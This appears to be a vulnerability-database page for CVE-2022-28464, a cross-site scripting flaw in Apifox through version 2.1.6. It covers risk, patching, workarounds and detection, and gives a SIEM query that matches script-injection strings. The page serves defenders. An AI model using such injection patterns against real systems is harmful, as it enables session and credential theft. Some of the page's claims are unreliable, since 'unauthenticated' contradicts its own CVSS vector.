Login Sign Up

CVE-2022-28464

9.0 CRITICAL
Remote Code Execution Cross-Site Scripting

📋 TL;DR

CVE-2022-28464 is a cross-site scripting (XSS) vulnerability in Apifox API development platform versions through 2.1.6 that allows attackers to inject malicious scripts. When exploited, this can lead to remote code execution by compromising user sessions and executing arbitrary code in the context of the application. All users running vulnerable Apifox versions are affected.

💻 Affected Systems

Products:
  • Apifox
Versions: through 2.1.6
Operating Systems: All platforms running Apifox
Default Config Vulnerable: ⚠️ Yes
Notes: All installations of affected versions are vulnerable regardless of configuration.

📦 What is this software?

Apifox by Apifox

View all CVEs affecting Apifox →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise via remote code execution, data theft, and lateral movement within the network.

🟠

Likely Case

Session hijacking, credential theft, and unauthorized access to API data and configurations.

🟢

If Mitigated

Limited impact with proper input validation and output encoding, potentially only minor data exposure.

🌐 Internet-Facing: HIGH - Web applications with XSS vulnerabilities are prime targets for internet-based attacks.
🏢 Internal Only: MEDIUM - Internal users could still exploit, but attack surface is smaller than internet-facing.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

XSS vulnerabilities are commonly exploited with readily available tools and techniques.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.1.7 or later

Vendor Advisory: https://www.yuque.com/docs/share/b3115557-2dce-4897-b297-454c6df89d18

Restart Required: Yes

Instructions:

1. Download latest Apifox version from official source. 2. Stop Apifox service. 3. Install updated version. 4. Restart Apifox service.

🔧 Temporary Workarounds

Input Validation Filter

all

Implement strict input validation to sanitize user inputs before processing.

Implement input validation in application code (language-specific)

Content Security Policy

all

Implement CSP headers to restrict script execution sources.

Add Content-Security-Policy header to web server configuration

🧯 If You Can't Patch

  • Isolate Apifox instances in network segments with strict access controls
  • Implement web application firewall (WAF) with XSS protection rules

🔍 How to Verify

Check if Vulnerable:

Check Apifox version in application settings or about dialog. If version is 2.1.6 or earlier, system is vulnerable.

Check Version:

Check version in Apifox UI or configuration files (platform dependent)

Verify Fix Applied:

Verify Apifox version is 2.1.7 or later after update. Test XSS payloads to confirm they are properly sanitized.

📡 Detection & Monitoring

Log Indicators:

  • Unusual script tags in request logs
  • Suspicious JavaScript payloads in URLs or parameters

Network Indicators:

  • HTTP requests containing script injection patterns
  • Unusual outbound connections from Apifox instances

SIEM Query:

source="apifox" AND (http_request contains "<script>" OR http_request contains "javascript:")

📊 Metadata

CVE ID: CVE-2022-28464
CVSS v3 Score: 9.0 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
CWE: CWE-79
Published: April 27, 2022
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2022-28464, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)